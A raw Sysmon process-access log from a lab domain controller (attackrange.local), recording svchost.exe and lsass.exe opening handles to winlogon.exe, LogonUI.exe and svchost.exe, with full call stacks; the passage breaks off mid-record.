13:58:16.633{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93F6-6005-E704-00000000A301}4572C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009953Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:16.633{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93F6-6005-E704-00000000A301}4572C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009952Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:16.633{59A5CD1D-8E44-6005-0B00-00000000A301}85696C:\Windows\system32\lsass.exe{59A5CD1D-93F6-6005-E704-00000000A301}4572C:\Windows\system32\winlogon.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009951Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:16.633{59A5CD1D-8E44-6005-0B00-00000000A301}85696C:\Windows\system32\lsass.exe{59A5CD1D-93F6-6005-E704-00000000A301}4572C:\Windows\system32\winlogon.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009950Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:16.618{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E904-00000000A301}4480C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+773d|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009949Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:16.618{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E904-00000000A301}4480C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009948Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:16.618{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E904-00000000A301}4480C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+163fd|c:\windows\system32\lsm.dll+23c29|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+db992|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009947Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:16.618{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E904-00000000A301}4480C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009946Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:16.618{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E904-00000000A301}4480C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+23c18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+db992|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009945Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:16.618{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E904-00000000A301}4480C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+19ab3|c:\windows\system32\lsm.dll+1fc37|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009944Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:16.618{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E904-00000000A301}4480C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+1fb39|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009943Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:16.618{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E904-00000000A301}4480C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009942Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:16.618{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E904-00000000A301}4480C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009941Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:16.618{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E904-00000000A301}4480C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+773d|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009940Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:16.618{59A5CD1D-8E46-6005-0F00-00000000A301}11161256C:\Windows\System32\svchost.exe{59A5CD1D-93F7-6005-E904-00000000A301}4480C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\termsrv.dll+a1087|c:\windows\system32\termsrv.dll+6aa58|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009939Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:16.618{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E904-00000000A301}4480C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009938Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:16.618{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E904-00000000A301}4480C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009937Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:16.618{59A5CD1D-8E44-6005-0B00-00000000A301}85696C:\Windows\system32\lsass.exe{59A5CD1D-93F7-6005-E904-00000000A301}4480C:\Windows\system32\LogonUI.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009936Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:16.618{59A5CD1D-8E44-6005-0B00-00000000A301}85696C:\Windows\system32\lsass.exe{59A5CD1D-93F7-6005-E904-00000000A301}4480C:\Windows\system32\LogonUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009935Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:16.602{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E904-00000000A301}4480C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009934Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:16.602{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E904-00000000A301}4480C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009933Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:16.602{59A5CD1D-8E44-6005-0B00-00000000A301}856988C:\Windows\system32\lsass.exe{59A5CD1D-93F7-6005-E904-00000000A301}4480C:\Windows\system32\LogonUI.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009932Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:16.602{59A5CD1D-8E44-6005-0B00-00000000A301}856988C:\Windows\system32\lsass.exe{59A5CD1D-93F7-6005-E904-00000000A301}4480C:\Windows\system32\LogonUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009931Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:16.602{59A5CD1D-8E44-6005-0B00-00000000A301}856988C:\Windows\system32\lsass.exe{59A5CD1D-8E46-6005-0F00-00000000A301}1116C:\Windows\System32\svchost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL